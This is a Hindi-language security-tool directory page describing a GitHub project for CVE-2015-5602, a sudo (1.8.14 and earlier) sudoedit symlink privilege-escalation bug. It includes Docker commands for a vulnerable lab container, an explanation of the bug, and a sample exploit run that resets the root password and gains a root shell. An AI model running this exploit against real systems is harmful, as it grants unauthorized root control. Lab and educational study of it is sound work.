Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
privesc-CVE-2015-5602 — Sudo <= 1.8.14 स्थानीय विशेषाधिकार उन्नयन और कमजोर कंटेनर | Kitploit
उपकरण/GitHubGitHub/t0kx/privesc-cve-2015-5602
विशेषाधिकार वृद्धिकंटेनर सुरक्षाभेद्यता विश्लेषणशोषणलर्निंग और शिक्षालैब और अभ्यास
GitHubt0kx/privesc-cve-2015-5602

privesc-CVE-2015-5602

Sudo <= 1.8.14 स्थानीय विशेषाधिकार उन्नयन और कमजोर कंटेनर

रिपॉजिटरी देखें
152238 साल पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

Sudo <=1.8.14 स्थानीय विशेषाधिकार वृद्धि

Sudo (su "do") सिस्टम प्रशासक को कुछ उपयोगकर्ताओं (या उपयोगकर्ताओं के समूह) को रूट के रूप में कुछ (या सभी) कमांड चलाने की क्षमता देने की अनुमति देता है, साथ ही सभी कमांड और तर्कों को लॉग करता है।

संवेदनशील वातावरण

अपने परीक्षण के लिए संवेदनशील वातावरण सेटअप करने के लिए आपको Docker स्थापित करना होगा, और बस निम्नलिखित कमांड चलाएं:

root@kitploit:~
docker build -t privesc/cve-2015-5602 .
docker run --rm -it privesc/cve-2015-5602

और यह कम उपयोगकर्ता विशेषाधिकारों के साथ एक इंटरैक्टिव शेल उत्पन्न करेगा।

संवेदनशील कोड

बग sudoedit में पाया गया था, जो पूर्ण पथ की जांच नहीं करता है यदि वाइल्डकार्ड दो बार उपयोग किया जाता है (जैसे /home/*/*/esc.txt), यह एक दुर्भावनापूर्ण उपयोगकर्ता को esc.txt वास्तविक फ़ाइल को किसी भिन्न स्थान (जैसे /etc/shadow) के लिए एक प्रतीकात्मक लिंक से बदलने की अनुमति देता है।

इस मुद्दे का सफलतापूर्वक शोषण करने से हमलावर फाइलों में हेरफेर कर सकता है और सिमलिंक हमलों के माध्यम से होस्ट सिस्टम पर रूट विशेषाधिकार प्राप्त कर सकता है।

शोषण

इस लक्ष्य का शोषण करने के लिए बस चलाएं:

root@kitploit:~
./exploit.sh

यदि आप इस संवेदनशील इमेज का उपयोग कर रहे हैं, तो आप बस चला सकते हैं:

root@kitploit:~
user@1cc9cd901b07:~$ sudo -l
User user may run the following commands on 1cc9cd901b07:
    (root) NOPASSWD: sudoedit /home/*/*/esc.txt
user@1cc9cd901b07:~$ ./exploit.sh 
[+] CVE-2015-5602 exploit by t0kx
[+] Creating folder...
[+] Creating symlink
[+] Modify EDITOR...
[+] Change root password to: d03c09dc34c53657aff1f459a86b20ed
[+] Done
user@1cc9cd901b07:~$ su
Password: 
root@1cc9cd901b07:/home/user# id
uid=0(root) gid=0(root) groups=0(root)
root@1cc9cd901b07:/home/user#

क्रेडिट्स

यह दोष Daniel Svartman द्वारा पाया गया था।

अस्वीकरण

यह या पिछला प्रोग्राम केवल शैक्षिक उद्देश्य के लिए है। बिना अनुमति के इसका उपयोग न करें। सामान्य अस्वीकरण लागू होता है, विशेष रूप से यह तथ्य कि मैं (t0kx) इन प्रोग्रामों द्वारा प्रदान की गई जानकारी या कार्यक्षमता के प्रत्यक्ष या अप्रत्यक्ष उपयोग से होने वाले किसी भी नुकसान के लिए उत्तरदायी नहीं हूं। लेखक या कोई भी इंटरनेट प्रदाता इन प्रोग्रामों या उनके किसी भी व्युत्पन्न की सामग्री या दुरुपयोग के लिए कोई जिम्मेदारी नहीं लेता है। इन प्रोग्रामों का उपयोग करके आप इस तथ्य को स्वीकार करते हैं कि इन प्रोग्रामों के उपयोग से होने वाली कोई भी क्षति (डेटा हानि, सिस्टम क्रैश, सिस्टम समझौता, आदि) t0kx की जिम्मेदारी नहीं है।

टूल डाउनलोड करें